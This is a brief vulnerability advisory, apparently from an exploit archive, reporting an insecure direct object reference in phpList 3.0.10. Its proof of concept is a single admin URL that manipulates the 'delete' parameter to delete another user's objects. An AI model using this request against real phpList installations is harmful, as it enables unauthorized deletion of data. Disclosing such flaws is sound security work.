phpList 3.0.10 Insecure Direct Object Reference

`# Affected software: phplist  
# Type of vulnerability: insecure object reference  
# URL:phplist.com  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
  
#version: phpList ltd. - v3.0.10  
# Proof of concept  
  
insecure object refrenced on page deltetation  
  
vuln param:delete  
  
  
example:  
  
http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99  
  
ref:  
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29  
  
`